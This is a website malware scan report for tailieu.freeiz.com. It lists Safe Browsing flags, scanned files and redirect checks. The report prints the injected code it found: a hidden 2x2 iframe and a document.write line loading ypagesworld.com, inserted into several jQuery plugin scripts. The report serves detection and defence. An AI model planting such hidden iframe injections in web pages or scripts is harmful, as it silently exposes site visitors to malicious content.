Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tailieu.freeiz.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tailieu.freeiz.com/ | 200 OK Content-Length: 1462 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://ypagesworld.com/omcd.html?i=943751 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ypagesworld.com/omcd.html?i=943751> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: text/javascript | clean |
http://tailieu.freeiz.com/scripts/jquery.prettyPhoto.js | 200 OK Content-Length: 23474 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ypagesworld.com/omcd.html?j=943751></iframe>');
(function($){$.prettyPhoto={version:'3.1.1'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({animation_speed:'fast',slideshow:5000,autoplay_slideshow:false,opacity:0.80,show_title:true,allow_resize:true,default_width:500,default_height:344,counter_separator_label:'/',theme:'pp_default',horizontal_paddi Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ypagesworld.com/omcd.html?j=943751 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ypagesworld.com/omcd.html?j=943751> | ||
http://tailieu.freeiz.com/scripts/uploader.js | 200 OK Content-Length: 46296 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ypagesworld.com/omcd.html?j=943751></iframe>');
(function(f){ f.fn.uploader = function() { var args = arguments[0] || {}; var allow = args.allow; if( args.shorturl ) { var defaults = args.shorturl; } else { var defaults = { login : 'leedotcom', apiKey : 'R_000000000000000000000000' } } var bas Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ypagesworld.com/omcd.html?j=943751 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ypagesworld.com/omcd.html?j=943751> | ||
http://tailieu.freeiz.com/scripts/slDropFile.js | 200 OK Content-Length: 18022 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ypagesworld.com/omcd.html?j=943751></iframe>');
if (!window.Silverlight) window.Silverlight = {}; Silverlight._silverlightCount = 0; Silverlight.__onSilverlightInstalledCalled = false; Silverlight.fwlinkRoot = "http://go2.microsoft.com/fwlink/?LinkID="; Silverlight.__installationEventFired = false; Silverlight.onGetSilverlight = null; Silverlight.onSilverlightInstall for(;i<j+4;i++) a.push(c.indexOf(s.charAt(i))); buf = (a[0] << 18) + (a[1] << 12) + ((a[2] & 63) << 6) + (a[3] & 63); b = [((buf & (255 << 16)) >> 16), ((a[2] == 64) ? -1 : (buf & (255 << 8)) >> 8),((a[3] == 64) ? -1 : (buf & 255))]; for(j=0;j<3;j++) if (b[j] >= 0||j===0) d.push(String.fromCharCode(b[j])); } return d.join(''); } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ypagesworld.com/omcd.html?j=943751 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ypagesworld.com/omcd.html?j=943751> | ||
http://stats.hosting24.com/count.php | 200 OK Content-Length: 1251 Content-Type: application/javascript | clean |
http://tailieu.freeiz.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Dec 2014 23:55:52 GMT Location: http://error404.000webhost.com/? Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | clean |
http://error404.000webhost.com/? | 200 OK Content-Length: 17596 Content-Type: text/html | clean |
http://creative.xtendmedia.com/matomy/cf/ply/ply.js?pubid=50792397&mid=c51681034&wid=c51531274&popup=1&popunder=1&size=320x480&pop_times=2&pop_frequency=3600&mm_delay=0&mm_back_delay=300&numOfTimes=3&duration=1&period=24hour&close=1&openNewTab=true | 200 OK Content-Length: 2880 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tailieu.freeiz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 23:55:49 GMT
Server: Apache
Content-Length: 1462
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...1462 bytes of data.
GET / HTTP/1.1
Host: tailieu.freeiz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 23:55:49 GMT
Server: Apache
Content-Length: 1462
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...1462 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tailieu.freeiz.com
Referer: http://www.google.com/search?q=tailieu.freeiz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tailieu.freeiz.com
Referer: http://www.google.com/search?q=tailieu.freeiz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.